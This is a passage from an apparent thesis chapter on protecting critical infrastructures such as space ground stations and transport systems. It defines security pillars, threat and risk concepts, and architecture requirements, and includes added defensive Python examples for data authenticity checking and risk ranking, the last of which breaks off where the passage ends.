facilities, networks, services and assets which, if disrupted or destroyed, would have a serious impact on the health, safety, security or economic well-being of citizens or prevent the effective functioning of governments in the Member States. Critical infrastructures extend across many sectors of the economy, including banking and finance, transport and distribution, energy, utilities, health, food supply and communications, as well as key government services. Following both definitions and the cited government documents, critical infrastructures include [32, 54]:

• Energy installations and networks (e.g. electrical power, oil and gas production, storage facilities and refineries, transmission and distribution systems);

• Communications and Information Technology (e.g. telecommunications, broadcasting systems, software, hardware and networks including the Internet, space control ground stations and others);

• Finance (e.g. banking, securities and investment);

• Health Care (e.g. hospitals, health care and blood supply facilities, laboratories and pharmaceuticals, search and rescue, emergency services);

• Food (e.g. safety, production means, wholesale distribution and food industry);

• Water (e.g. dams, storage, treatment and networks);

• Transport (e.g. airports, ports, intermodal facilities, railway, ships and mass transit networks, traffic control systems);

• Production, storage and transport of dangerous goods (e.g. chemical, biological, radiological and nuclear materials, CBRN);

• Government (e.g. critical services, facilities, information networks, assets and key national sites and monuments);

• National monuments, symbols and icons that represent national heritage, traditions and values.

Infrastructure systems are characterized by a high degree of interconnection. Many physical, virtual and logical dependencies are not apparent until a crisis occurs and a connection breaks down. This high level of interdependence can lead to cascading shutdowns. At the same time, ever smaller disruptions are enough to cause dramatic consequences in complex systems. Malevolent acts may involve effects that are more severe than those expected from accidental risk. Some examples of relevant consequences include:

• Injuries to the public or to workers;

• Environmental damage;

• Direct and indirect financial losses to the company and to suppliers and associated businesses;

• Disruption to the national, regional or local operations and economy;

• Loss of reputation or business viability;

• Need to evacuate people living or working near the facility;

• Excessive media exposure and related public concern affecting people that may be far removed from the actual event location.

In this scenario, a security system protecting space control ground stations against physical and cyber attacks is of great importance nowadays, because of the central role such stations play in offering efficient and continuous services to governmental assets and citizens for satellite communication, global navigation systems and Earth Observation (EO), both for surveillance of the national territory and for remote sensing in environmental monitoring. In the same way, an effective Incident Management system requires the recording of events, useful to reconstruct the scenario before and during an accident. Accidents in the transport world, such as those taken into consideration here, combine the challenge of having to record data during a catastrophic event that is potentially destructive for the recording devices themselves. This is particularly relevant in the world of naval transport, where safety has always been improved through the motto "learning the hard way", that is, observing carefully when something unexpected happens and then improving accordingly [27]. The words accident and incident are often confused, both stemming from the same Latin root. In the case of events that undermine the safety of a means of transport, the event is classified as accidental or incidental depending on whether there is fraud, fault, or it is completely "fortuitous". Instead, we define an Information Assurance problem as an incident, and the procedure of reaction is called Incident Management.

The importance and the quality of a security system is determined by a few key factors of a critical structure, which include [32]:

1. The hazard degree;

2. The vulnerability degree;

3. The possible consequences of an Incident caused by an illegal intrusion;

4. The interest of malevolent parties in attacking a critical infrastructure, or the superficiality (or the fraud) of the operators of the critical infrastructure, which leads to reduced safety or security conditions.

The vulnerability analysis is mainly based on quantitative and qualitative risks. They must be ordered in a priority list in order to establish the main countermeasures. The main objectives of a security system must fit the following basic strategies for minimizing the risks [32]:

1. Deter (prevention);

2. Detect;


The main steps of the methodology for assessing the vulnerability of a security surveillance system are:

1. Assets;

2. Threat assessment;

3. Critical infrastructure vulnerability analysis;

4. Risk assessment;

5. Countermeasures analysis.

The resulting countermeasures are [32]:

1. Identification of physical and cyber security systems: perimetral barriers, detection of physical and cyber intrusions, access control, internal guards;

2. Identification of process security systems;

3. Management of the surveillance procedures;

4. Detection of hazard situations and assessment capability;

5. System reconfiguration procedures in the case of network fault.

The bibliography of this thesis includes excellent contributions concerning the state of affairs represented in this paragraph, such as [9, 11, 24, 53, 56]. The existing literature and the case studies described in the next chapters have prompted the need to advance the state of the art both through a better mitigation and attribution system and through a critical analysis of the current Incident Management techniques in the transport domain. Therefore innovative solutions, based also on technology transfer, are proposed.

2.2 Motivation

An open, tolerant, peaceful, and vibrant society offers citizens the conditions necessary to flourish economically, intellectually, physically, and emotionally [53]. These conditions allow members of whatever civil society to thrive, maintaining tolerance and social discourse. Once an adversary successfully breaches a critical infrastructure, even without killing or injuring anyone, the effects can be devastating. Threat perception will then foster insecurity and prompt visions of an inescapable cycle of dangers. Dispersed infrastructures in key sectors like transport and networks are sensitive and difficult to protect. Elaborating from [29], we can say that dispersed infrastructures are prone at the same time to realistic threat, which refers to potential harm to tangible or concrete objects (e.g., money, land, human life), and to symbolic threat, including landscape and natural/cultural heritage. We aim to develop novel management criteria and instruments able to dispel insecurity, protecting infrastructure and communicating trust and confidence in the self-defense capabilities that can generate psychological well-being.

A generic Critical Infrastructure encloses several safety-critical or life-critical aspects which may lead to the following outcomes upon failures or malfunctions: death or serious injury to people, loss or severe damage to equipment/property, environmental harm, or paranoia and general distrust in essential services such as water supply. To these must be added damage from hackers infecting systems with ransomware, blocking operationality and/or causing intentional damage to force victim infrastructures to pay the ransom. As government or criminal organizations become more sophisticated, it becomes of central importance that our critical infrastructure is prepared to absorb and promptly react to the emergence of unknown attackers and attack vectors. This must involve a combination of technological and human resources that are capable of identifying, measuring, reacting to, and containing highly targeted attacks in a timely fashion, while operating under strong operative and data limitations.

The results or consequences of cyber attacks can be difficult to define, precisely because the damage can be greater than expected or known. Operationally, it is impossible to know which attacks or what information the attacker has at their disposal when planning or delivering an attack. On the other hand, infrastructure monitoring is always incomplete, threats are often unknown, and reaction plans and resource allocations are widely suboptimal. This challenge underlies the unmanageability of modern complex systems across all economic sectors. The transport sector is a prime case: geographically vast infrastructures, complex human-system interactions, and interdependencies across different transport applications cover the wide range of sources of uncertainty with which all sectors deal.

As said, threats against the integrity of a critical infrastructure are either intentional or accidental. Accidental are those interruptions to the normal activities of a critical infrastructure caused by unexpected events, negligence or errors in the design and management of the systems. Instead, a deliberate and intentional act against a critical infrastructure is to be considered taking into account the repercussions on the population of the nation and the asymmetry (or lack of proportionality) between an attack and the extent of the consequences.

Accidents (or Incidents) on critical infrastructures, which are complex organizations, cannot be attributed to a single cause, even if they have been, for a long time, explained as a failure of technology or an operators' error. What these explanations have in common is the attribution of every responsibility for the incident not to the organization and its operating practices, but to the most convenient scapegoat: human error [24]. However, let us consider as an example the accident of the Costa Concordia ship, which primarily represents a component of a critical transport infrastructure. When an event like this happens, it is the whole organization that fails: the ship's management, the company's risk and security management system, the control system. In this case, not just some of the operators who are closest to the task seem to have shown particular negligence. The analysis of the major organizational disasters showed, in fact, the importance of organizational factors in the etiology of such events. The proximate causes of an accident are the product of underlying causes and organizational factors. Many accident investigations make the same mistake in the definition of causes: they tend to focus mainly on the person who made the mistake or the technical component that did not work properly. It is then necessary to investigate the organizational factors that have favored the disaster, beyond the human error (certainly predominant) and the technical failures. Yet, the exploitation of recorded data by specific Critical Infrastructure subsystems is fundamental for the legal reconstruction of the scenario in case of serious malfunctions and accidents and is essential to identify and attribute human and/or machine responsibilities. These subsystems are called Event Data Recorders and must guarantee information security in terms of data integrity and availability.

It is not possible to introduce the concepts and the new paradigms described in this research without having made some reference to the semantic field of cybersecurity. We therefore describe the fundamental concepts that are derived from all critical infrastructures in sections 2.2 and 2.3. The rest of the chapter contains a reasoned description of the Critical Infrastructure Protection requirements.

2.2.1 Modeling and Simulation methodological approaches

Modeling and Simulation approaches can be used to study inter-dependencies for critical infrastructure protection. Any critical infrastructure subsystem is linked to the others by means of dependencies, and some of them involve cybersecurity operations and/or human behavior. Moreover, critical infrastructures are joined and heavily dependent on each other. For these reasons, in the event of disruption of the operation of a single critical infrastructure, other infrastructures may suffer adverse effects, both directly and indirectly. As stated in [23] and demonstrated by previous work on this subject [36, 47, 48], a challenge is to provide formalism, methodologies, and tools to model the entire complex system composed of humans, critical infrastructures and their own connections. Agent Based Modelling and Simulation (ABMS) and federated simulation are the most promising techniques to study the inter-dependencies in critical infrastructures, and their benefits can be jointly exploited [23]. These techniques have been studied and taken into consideration, even if the methodology for the case studies presented in this work uses an example-driven approach. This method was necessary since the starting points of this research have been case studies made available by the end-users (Italian Space Agency and NATO) or based on the incident management of critical transport infrastructures. However, event-propagation-driven models compatible with the cited methodologies were not envisaged.

2.3 Cyber Security Pillars

The information and communication technology (ICT) security of a Critical Infrastructure system is analyzed with respect to the properties of integrity, availability, confidentiality, authenticity and non-repudiation. A system consisting of different assets may be subject to a number of threats or potential attacks. If the system is vulnerable with respect to a threat, ICT security may not be fulfilled, which leads to a risk. Hence, a risk exists if one of the assets of the system is vulnerable to a threat, as depicted graphically in Fig. 2.1.

The following subsections provide the reader with the definition of the main security pillars that will be taken into consideration for the rest of the document. As introduced, these are the basic technologies, the bricks, with which the strategies of Detection, Mitigation and Reaction are implemented. Paragraphs 2.3 to 2.7 follow the representative and logical outline of the contents as defined by the unclassified Technical Report Template of the Science and Technology Organization and the NATO Groups on Security.


Figure 2.1: Risk as the intersection of an asset, threat and a vulnerability.

2.3.1 Confidentiality

The objective of confidentiality, as considered in this project, is assuring that information is not made available or disclosed to unauthorized parties, without hindering authorized parties from accessing the information.

2.3.2 Authenticity and Integrity

By authenticity and integrity we understand the capability to verify the validity of a piece of data (after transmission or storage). This includes being able to verify that the message was actually transmitted or stored by an authorized source (i.e., a device having a valid cryptographic key), and also being able to verify that the information was neither accidentally nor intentionally modified after its transmission/storage by the legitimate user. Note that if an authentic/trusted device gets stolen, it is still considered as an authentic device within the system, since it can produce data that is signed using the correct key.

2.3.3 Availability

The definition of availability is quite straightforward, just being the degree to which a system, subsystem, or equipment is operable and in a committable state at the start of a mission, when the mission is called for at an unknown, i.e., a random, time. Simply put, availability is the proportion of time a system is in a functioning condition.

2.3.4 Non-Repudiation

Although they share similar technologies and paradigms, Authentication and Non-Repudiation are two different sorts of concepts. Regarding digital security, the meaning and application of non-repudiation describes a service that provides proof of the integrity and origin of data.

2.4 Critical Infrastructure reference architecture

In order to identify risks, the architecture of the system, i.e., the properties and relationships between assets, must be known. Based on the capability requirements, a high-level communication architecture model is defined, which allows identifying the different assets which might be subject to threats and vulnerabilities leading to risks in the infrastructure. Given the high modularity taken into consideration when defining such a network, the identified communication infrastructure is general enough to be also applied in very diverse contexts by simply taking into consideration all or part of the different subsystems from time to time. Such a modular approach also allows for scalability and robustness. In a nutshell, from the architectural point of view, the reference communication network can be seen as the interconnection of several heterogeneous networks. The reference communication network can be split into 4 components:

• Surveillance

• Data collection and processing

• Command and control

• Communication infrastructure

Although this description introduces a strict separation between components, in practice these components might be intertwined.

2.4.1 Reference Architecture assumptions

In this sub-section, there follows a brief discussion about the general assumptions made in this phase. What is described in this section is an abstraction used to define the concepts underlying the example architecture which implements the research studies as described in Chapters III and IV. As discussed in the previous section, the foreseen communication architecture is very general and modular, so that roughly every kind of technology can be applied in the system. Nonetheless, a TCP/IP protocol stack is assumed. Also, it is important to highlight that, referring to the discussed communication systems, no strict assumptions on the different communication links and devices have been made, just distinguishing them into macro-categories that present similarities from the Information Assurance point of view (e.g., a laser link is not distinguished from a WiFi link, both of them being wireless links, united by similar considerations from the security point of view). By authentication, the process of checking the authenticity of the data is intended, i.e., whether data was transmitted by an authentic source (a source in possession of a valid cryptographic key). The authentication of users in the network, i.e., the process of checking if a user/device has the permission to access the network, is not taken into direct consideration. However, user authentication schemes using e.g. IDs/passwords or biometric features that are well suited for the particular application or device are important for ensuring the security of the Critical Infrastructure network. It is hence necessary to also take into consideration security mechanisms that prevent an attacker from, e.g., recovering the encryption keys stored in a non-persistent moving device an attacker has access to. This requires proper key/certificate revocation mechanisms that are not considered.
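The following worked example is an added illustration and not the thesis's own code. It makes concrete the notion of data authenticity from 2.3.2 (data is authentic when it carries a tag made with a key the system recognises, so a stolen device keeps producing "authentic" data) together with the key revocation mechanism that 2.4.1 leaves out of scope. HMAC-SHA256 is assumed as the per-device keyed tag; the device ids, keys and sensor readings are constructed sample values.

```python
"""Data authenticity check with key revocation (added example)."""
import hashlib
import hmac

# Constructed key registry: device id -> per-device secret key.
DEVICE_KEYS = {
    "sensor-01": b"constructed-key-for-sensor-01",
    "sensor-02": b"constructed-key-for-sensor-02",
}


def _tag(key: bytes, device_id: str, payload: bytes) -> str:
    # The device id is bound into the tag so a tag cannot be re-attributed
    # to another device even when both carry the same payload.
    return hmac.new(key, device_id.encode() + b"|" + payload,
                    hashlib.sha256).hexdigest()


def sign(device_id: str, payload: bytes) -> dict:
    """Tag a reading as the device would before transmission or storage."""
    return {"device": device_id, "payload": payload.decode(),
            "tag": _tag(DEVICE_KEYS[device_id], device_id, payload)}


def verify(msg: dict, revoked=frozenset()) -> str:
    """Classify a received message.

    Returns one of "authentic", "revoked", "unknown-device", "tampered".
    The revocation check runs before the tag check: a stolen device still
    holds a valid key, so only the revocation list can reject its output.
    """
    device = msg.get("device", "")
    if device not in DEVICE_KEYS:
        return "unknown-device"
    if device in revoked:
        return "revoked"
    expected = _tag(DEVICE_KEYS[device], device, msg["payload"].encode())
    # Constant-time comparison avoids leaking the tag through timing.
    if not hmac.compare_digest(expected, msg.get("tag", "")):
        return "tampered"
    return "authentic"


def scenario() -> dict:
    """Walk through the cases described in the text; returns the outcomes."""
    genuine = sign("sensor-01", b"temp=21.5")
    altered = dict(genuine, payload="temp=99.0")        # modified in transit
    reattributed = dict(genuine, device="sensor-02")    # tag under wrong device
    stolen = sign("sensor-02", b"temp=20.0")            # device stolen, key intact
    return {
        "genuine": verify(genuine),
        "altered": verify(altered),
        "reattributed": verify(reattributed),
        "stolen_before_revocation": verify(stolen),
        "stolen_after_revocation": verify(stolen, revoked={"sensor-02"}),
        "unknown": verify({"device": "sensor-99", "payload": "x", "tag": ""}),
    }


if __name__ == "__main__":
    for case, outcome in scenario().items():
        print(f"{case:26s} -> {outcome}")
```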

2.4.2 Analysis of the architecture and its requirements

Preliminary activities for the design of the cyber protection solution for the critical infrastructures are:

• Architecture definition: this first phase focuses on the study of the reference architecture and scenarios, with the aim of determining the architecture of the Critical Infrastructure communication infrastructure. Hence, this activity is mainly focused on identifying the different types of networks to be used in the different considered scenarios, as well as the common backbone to allow interoperability of such networks.

• Functional requirement definition: once the communication architecture has been identified and properly characterized, functional requirements of the communication architecture, specifying what the solution must do, must be defined from the Information Assurance point of view. This phase has been characterized by a deep analysis of the literature on vulnerabilities and cyber threats at first and then on Information Assurance in the Critical Infrastructure context. The output is given by the list of functional requirements in terms of: confidentiality, authentication, integrity, availability, and non-repudiation. In order to clearly understand the problem domain before devising a solution, functional requirements are defined in a way that makes them independent of a particular technology implementation.

• Non-functional requirements definition: once the functional requirements have been defined, the last phase of the analysis concerns the definition of non-functional requirements, which refer to additional technical and operational requirements for the solution to be implemented and supported. Hence, the technology platform required to support the foreseen solution is specified.

2.4.3 Threats, Vulnerabilities and Risks

Below is a list of definitions used to describe the risk analysis of a generic Critical Infrastructure:

• Threat: a potential cause of an incident that may result in harm to a system or organization. A threat may be defined by its source, motivation or result; it may be deliberate or accidental, violent or surreptitious, external or internal.

• Vulnerability: a weakness of an asset (resource) or a group of assets that can be exploited by one or more threats. Examples of different types of vulnerabilities are: physical vulnerabilities, natural vulnerabilities, hardware/software vulnerabilities, media vulnerabilities (e.g., stolen/damaged disks/tapes), emanation vulnerabilities (e.g., due to radiation), communication vulnerabilities, and human vulnerabilities.


Figure 2.2: Relationship among risk, threat, vulnerability and Consequences.

• Risk: potential for loss, damage, or destruction of an asset as a result of a threat exploiting a vulnerability. Strongly related to risk there exist two main concepts:

• Risk management: the process of identifying, controlling and minimizing or eliminating security risks that may affect information systems, for an acceptable cost; assessment of risk and the implementation of procedures and practices designed to control the level of risk.

• Risk assessment: assessment of threats to, impact on and vulnerabilities of information and information processing facilities and the likelihood of their occurrence; identification of the risk, analysis of the risk in terms of performance, cost, and other quality factors; risk prioritization in terms of exposure and leverage.

• Cyber Threat Actor: entities that would knowingly seek to manifest a threat.

As an example, to clarify such elements, let us consider a system that allows weak passwords:

• Vulnerability: the password is vulnerable to exhaustive (brute-force) key attacks.

• Threat: an intruder can exploit the password weakness to break into the system.

• Risk: the resources within the system are prone to illegal access/modification/damage by the intruder.

It is important to note that there exists a relation among threats, vulnerabilities, and risks. Such a relation roughly says (Fig. 2.2) that the level of risk is given by the product of the capacity level of the threat and the importance of the vulnerability. It is clear that in the described context, given that the threats can be represented by very highly skilled hackers, also "small" vulnerabilities can lead to very high levels of risk.
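As an added worked example, not part of the thesis, the following script encodes the relation just described: a risk exists only at the intersection of an asset, a vulnerability and a threat able to exploit it (Fig. 2.1), its level is the product of threat capacity and vulnerability importance (Fig. 2.2), and the ranked register is the priority list from which countermeasures are chosen. Every asset, threat and score is a constructed sample value; it also shows how a "small" vulnerability outranks a larger one once a highly skilled threat is in scope.

```python
"""Risk register worked example (added illustration, constructed data)."""
from dataclasses import dataclass, field


@dataclass(frozen=True)
class Threat:
    name: str
    capacity: int        # capacity level of the threat agent, 1 (low) to 5 (very high)
    exploits: frozenset  # vulnerability classes this threat is able to exploit


@dataclass(frozen=True)
class Vulnerability:
    name: str
    vclass: str          # e.g. "human", "communication", "hardware/software", "physical"
    importance: int      # importance of the weakness, 1 (minor) to 5 (critical)


@dataclass
class Asset:
    name: str
    vulnerabilities: list = field(default_factory=list)


def risk_level(threat: Threat, vuln: Vulnerability) -> int:
    """Level of risk = threat capacity x vulnerability importance (Fig. 2.2)."""
    return threat.capacity * vuln.importance


def risk_register(assets, threats):
    """Enumerate every asset/threat/vulnerability intersection (Fig. 2.1).

    A (threat, vulnerability) pair only yields a risk when the threat is able
    to exploit that vulnerability class. The result is the priority list:
    highest risk first, ties broken by name for a stable ordering.
    """
    register = []
    for asset in assets:
        for vuln in asset.vulnerabilities:
            for threat in threats:
                if vuln.vclass in threat.exploits:
                    register.append((risk_level(threat, vuln), asset.name,
                                     threat.name, vuln.name))
    register.sort(key=lambda r: (-r[0], r[1], r[2], r[3]))
    return register


# Constructed sample: a ground-station segment with three assets.
SAMPLE_ASSETS = [
    Asset("operator console",
          [Vulnerability("weak operator password", "human", 3)]),
    Asset("telemetry radio link",
          [Vulnerability("unencrypted wireless link", "communication", 4)]),
    Asset("wired backbone",
          [Vulnerability("unmonitored patch panel", "communication", 2)]),
]

# Constructed sample threats; the natural one exploits no listed class and
# therefore contributes no entry to this register.
SAMPLE_THREATS = [
    Threat("highly skilled intruder", 5, frozenset({"human", "communication"})),
    Threat("curious insider", 2, frozenset({"human"})),
    Threat("power failure (natural)", 3, frozenset({"physical"})),
]


def top_risk(assets=SAMPLE_ASSETS, threats=SAMPLE_THREATS):
    """Highest-priority entry of the register, or None if no risk exists."""
    register = risk_register(assets, threats)
    return register[0] if register else None


if __name__ == "__main__":
    for level, asset, threat, vuln in risk_register(SAMPLE_ASSETS, SAMPLE_THREATS):
        print(f"{level:3d}  {asset:22s} {threat:26s} {vuln}")
```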

More in general, the risk is strongly related to the types of damages that can be produced by exploiting a given vulnerability. At a high level the following type of damages can be defined:

• Interruption: some specific services and/or resources are either destroyed or made unavailable (e.g., a communication link becomes unusable because of either a physical damage or a cyber-attack and information cannot be exchanged over that link).

• Interception: an unauthorized party is able to snoop or to get access to a resource (e.g., an unauthorized party is able to intercept the information transmitted over a communication link).


• Modification: an unauthorized party is able to modify a resource (e.g., data stored in a database).

• Fabrication: an unauthorized party is able to insert a fake asset/resource (e.g., some fake data are inserted in a database).

Finally, to conclude the quick overview on the basics of threats and vulnerabilities, it is worth describing the different components of a threat:

• Threat agent: the actor of a threat, e.g., criminals, terrorists, subversive or secret groups, state sponsored, disgruntled employees, hackers, pressure groups, commercial groups. Usually classified in: i) Natural: fire, floods, power failure, earthquakes, etc.; ii) Unintentional: insider, outsider: primarily non-hostile; iii) Intentional: insider, outsider: hostile or non-hostile (curious).

• Capability: the tools used by the threat agent, e.g., software, technology, facilities, education and training, methods, books and manuals (note that this concept refers to a different context with respect to, and is not in contradiction with, what is discussed in the previous section).

• Threat inhibitors: the elements that discourage the threat agent from carrying out the threat, e.g., fear of capture, fear of failure, level of technical difficulty, cost of participation, sensitivity to public perception, law enforcement activity, target vulnerability, target profile, public perception, and peer perception.

• Threat amplifiers: the elements that encourage the threat agent to carry out the threat, e.g., peer pressure, fame, access to information, changing high technology, deskilling through scripting, skills and education levels, law enforcement activity, target vulnerability, target profile, public perception, peer perception.

• Threat catalysts: the elements that somehow accelerate the execution of the threat, e.g., events, technology changes, personal circumstances.

• Threat agent motivators: the reasons that push the threat agent to carry out the threat, e.g., political, secular, personal gain, religion, power, terrorism, curiosity.

In more detail, given that the scope of the Critical Infrastructure Cyber Protection is to focus on Information Assurance, the following will focus on the threats that are specific to information systems, providing a (non-exhaustive) list of potential threats:

• Trojan Horse: these programs allow remote access to the victim machine. They are characterized by two components: one runs as a server on the victim machine, "opening a door" to the attacker, and another one runs as a client on the attacker machine and is used to remotely access the target system.

• Spoofing: fooling other computer users to think that the source of their information is coming from a legitimate user.

• Sniffing/Eavesdropping: used by the attacker to observe the data transmitted over a communication channel.

• Scanning: used by the attacker to list all the open ports, services, and vulnerabilities present in the target system.


• Masquerading: A masquerade attack is an attack that uses a fake identity, such as a network identity, to gain unauthorized access to personal computer information through legitimate access identification.

• Man-in-the-Middle (MitM): used by the attacker to put herself transparently in the middle of a communication between other entities. It can be realized both in a LAN (e.g., ARP poisoning) and in a WAN (e.g., routing poisoning).

• Denial of Service: the main aim of this attack is to bring down the targeted system and make it unavailable for legitimate users. Although it is often a very basic attack, it does not require high expertise to be effective and potentially dangerous.

From the information assurance point of view, it is important to observe that all of these attacks must be considered somehow critical to the Infrastructure. Indeed, in the field almost all of the described threats are combined together to produce what is called an Advanced Persistent Threat (APT): a very low intensity attack, in which the attacker is tasked to perform an attack and will use any technique, over long periods of time, until the target is finally accomplished.

2.5 Communication Links Requirements

Communication links are an important component of a communication network. Different types of communication links bring different security implications regarding confidentiality and authenticity. In particular, attacking different link types requires different levels of sophistication, in proportion to the attacker's capabilities and motivations. A possible classification of the so-called levels of sophistication is very complex to carry out, as it should consider the quantity, quality and effectiveness of the tools available as well as the complexity of the implementation in the protected context.

2.5.1 Confidentiality

The confidentiality of data that is transmitted over a channel highly depends on the link type that is used for transmission. In the reference Critical Infrastructure communication network system in the capability requirements there are different types of local, static and dynamic links that rely either on wired or wireless channels. In particular, the confidentiality of the transmission using wired channels is higher in most scenarios since physical access to the wires is required (even if not sufficient) in order to eavesdrop the communication. Many subsystems may be connected using wireless radio links that are more vulnerable against wiretapping and eavesdropping of the data transmission since all users that are in the coverage of the radio signal could receive the data.

2.5.2 Authenticity and Integrity

The authenticity as well as the integrity of the transmitted data is also highly dependent on the particular link type and the topology of the network. Threats on links that affect the authenticity and integrity of the data are in particular man-in-the-middle attacks, where the attacker controls and manipulates the data that is transmitted over the network by spoofing the legitimate network users. For wired communication links, an attacker needs to have physical access to the network in order to manipulate data transmission. Generally speaking, getting physical access to wired networks (cables, ports, ...) is somewhat harder than getting access to wireless networks, and requires more sophisticated mechanisms. This is particularly true considering the physically protected nature of the critical infrastructures considered.

2.5.3 Availability

Regarding the availability concept, the distinction between links and physical devices has a strong impact considering attacks aimed at making either of them (and not the actual information) unavailable to a legitimate user. From this point of view, attacks such as DoS/DDoS (Denial of Service/Distributed Denial of Service) can be aimed, for example, at overwhelming the communication channel so that legitimate users do not have enough available resources to transmit their information. Taking this observation into consideration, it is clear that making a wireless link unavailable to legitimate users is feasible both at the physical layer (e.g., jamming) and at the information layer (e.g., flooding the link with fake information), with the communication channel accessible by definition (i.e., the wireless link is a broadcast link) to the attacker. On the other hand, to compromise the physical layer availability of a wired link an attacker would need to have physical access to the link (which is not necessarily accessible to the attacker) and then either damage it or inject traffic on the link.

2.5.4 Non-Repudiation

Like authenticity and integrity, non-repudiation of the transmitted data is highly dependent on the particular link type as well as the network topology. So threats on links that affect the authenticity and integrity of the data, in particular man-in-the-middle attacks, likewise affect non-repudiation. Man-in-the-middle attacks happen when the attacker controls and/or manipulates the data that is transmitted over the network by spoofing the legitimate network users. Because attacks against wired communication links require the attacker to have physical access to the network in order to manipulate data transmission, they are less practical in principle. In fact, getting physical access to wired networks is more challenging than to wireless networks.

2.6 Physical Security Requirements of Cryptographic Units

The term physical cryptographic unit should be used to refer to the different physical devices which are part of the Critical Infrastructure network and store and/or process information which is protected by cryptographic means. The information stored in physical cryptographic units (such as encryption keys, for example) might be leaked if unauthorized parties have physical access to it. For example, in a naïve cryptographic implementation, cryptographic keys might be stored in cleartext in memory. If unauthorized parties have access to the unit they can get access to the memory and obtain the keys. In a more realistic example the keys are not stored in cleartext, but might still leak to an attacker with physical access to the unit through a "side channel attack", which might consist of measuring the encryption/decryption time or the power consumption during encryption/decryption.


The level of sophistication necessary to obtain physical access to the physical cryptographic units in different types of devices in the communication system (e.g., planes, satellites, surface, ...) can be of a very heterogeneous nature and complexity.

The probability of having physical access to units affects the confidentiality, authenticity and integrity of the data that is stored and/or processed inside the unit.

• Confidentiality: the confidentiality of the stored and processed data inside physical units can be threatened if an attacker has virtual or physical access to the unit. In particular, stored data can leak if an attacker has physical access to the memory or storage. Such attacks are particularly dangerous as the amount of data that is stored or processed in physical units can be very large.

• Authenticity and Integrity: the authenticity and integrity of the stored and processed data plays a very important role in the Critical Infrastructure system. Threats where physical devices are modified to transmit disturbed data (e.g., by spoofing sensors) are particularly dangerous as they may affect the whole system.

• Availability: in the case of physical units, the availability concept can be seen as the fact that the legitimate user must be able to access information stored in servers, when needed. From this point of view, as in the case of the availability for communication links, there are both physical attacks on the servers (which should be very difficult to access by the attacker) and information level attacks (i.e., overwhelming the server resources, access bandwidth or computational resources, to make them unable to process legitimate requests).

• Non-Repudiation: The concept of non-repudiation is particularly critical when it comes to transmitting commands and subsequently evaluating reliability. The considerations made for authentication are also valid here. Authentication and non-repudiation are two different sorts of concepts. Nevertheless, Authentication is a technical concept: it is solved through cryptography. On the other side, Non-repudiation is a legal concept: it is solved through legal and social processes, possibly aided by technology but above all on an administrative front.

2.7 Information Assurance Functional Requirements

Based on the threats and vulnerabilities from the previous section, requirements and possible security measures to ensure the confidentiality, authenticity, integrity, availability and non-repudiation of the information within the Critical Infrastructure are identified.

2.7.1 Confidentiality, integrity, and authenticity

Starting from confidentiality, integrity, and authenticity (CIA), the following requirements can be defined:

• Protection of the confidentiality of transmitted, processed and stored data: the confidentiality of the data within the system needs to be protected using long-term secure encryption and decryption mechanisms that cannot be broken by an attacker. According to the security level that must be enforced, all or part of the data must be protected (security levels will be described later on in this report).


• Secure distribution, management and storage of keys: secret keys that are used for encryption and decryption need to be managed, distributed and stored in a secure way in order to prevent leakage of confidential information.

• Assurance of the authenticity and integrity of data: the authenticity and integrity of the data within the Critical Infrastructure network needs to be ensured to prevent spoofing and masquerading attacks. According to the security level that must be enforced, all or part of the data must be protected.

2.7.2 Availability

High-level requirements can be defined that must be satisfied by the system and can be distinguished in five main categories:

• Detection and prevention of malicious events: it represents the main objective of a security system in general. It can be realised by properly designed firewalls and Intrusion Detection Systems (IDSs), to be implemented together with the previously described security measures.

• Privacy preservation and data aggregation: the second goal of the system is to be able to manage the complexity and size of the data collected from the network and hosts. Encryption mechanisms are going to be enforced during the transport of the data between each element of the architecture, so as to guarantee the confidentiality of the data as well as the privacy of the user generating such data.

• Attack redirection to honeynets: when an attack is detected, the system can react by redirecting the attack traffic to a honeynet. This objective is focused on the collection of attacker data while interacting inside the honeynet, producing precious information that can feed the detection algorithms with new malicious behaviour.

• Self-protection: as the system itself is expected to be the target of attacks, it has to be built to resist them and react in the case of a platform compromise. To do so the system may deploy probes at the actual elements of the platform.

• Continuous monitoring: even if it is probably a more general requirement, a final remark concerns the need for the security level of the communication system to be continuously monitored (e.g., by performing security assessments and/or penetration testing) in order to verify the effectiveness of the implemented security measures.

2.7.3 Non-repudiation

Finally, concerning non-repudiation, the requirements can be expressed as:

• Mutual guarantee: Confidence in an exchange of data or commands within the Critical Infrastructure is certified retrospectively by means of non-breakable digests of Digital Signatures and suitable administrative measures. Obviously such requirements will be enforced only when/where needed (e.g., transmission of commands or official documents) and not all the time.


2.8 Information Assurance Non-Functional Requirements

2.8.1 Confidentiality

In order to ensure the confidentiality of the transmitted, stored and processed data, encryption and decryption mechanisms are required. In general, there are two variants of encryption schemes:

• Symmetric cryptosystem: for encryption and decryption the same secret key is used.

• Asymmetric cryptosystem: for encryption and decryption different keys are used.

Both methods, a symmetric and an asymmetric cryptosystem, are considered as possible countermeasures to ensure the confidentiality of the data.

2.8.2 Availability

The assurance of availability is, in general, a more complex topic than the others since no direct solution exists (like encryption for providing confidentiality). In the considered scenario, it can be assumed that guaranteeing the availability of the different resources must be accomplished by:

• Physically protecting the different elements of the communication infrastructure.

• Hardening the devices.

• Guaranteeing that the devices are in a working state, by avoiding for example obsolescence of the devices.

• Preventing and detecting cyber threats, so as to be able to promptly stop them or mitigate their effect.

It is important to notice that, in preventing and detecting cyber-attacks, one must take care of both outsiders and insiders. This means that standard solutions based on “simple” perimeter security are not enough to satisfy our requirements. Hence, a distributed system of devices (firewalls and probes) must be considered, which communicate towards a central entity, responsible for actually detecting attacks and generating alerts, as well as reacting to the attacks.

To achieve availability, three distinct elements should be combined together, so as to obtain an acceptable protection from the attacks: firewalls, IDSs, and honeynet. In Fig. 3.2 the proposed resulting security architecture is described. Referring to the general communication framework, the different types of communication networks (e.g., Command and Control, Surveillance) are represented by the blue-shadowed circles, where the different communication devices of each “sub-network” are located. As can be seen, each network is provided with a firewall and a network probe (located at the network gateway) and some host probes, located at the different communication devices. All of the different networks are connected by means of secure channels via a backbone communication infrastructure, to which the honeynet is also connected. From a functional point of view, the different elements provide different services. The
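As an added illustration (not part of the thesis or of its prototype), the following Python sketch models the central entity of the architecture just described: host and network probes from each sub-network report events, the central entity correlates them per source, and a source seen across more than one sub-network (i.e. one that has already passed a perimeter, insider or compromised host) is redirected to the honeynet while a single-network offender is blocked at that network's firewall. Sub-network names, the event types, the threshold and all sample reports are constructed assumptions.

```python
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class ProbeEvent:
    """One report sent by a host or network probe to the central entity."""
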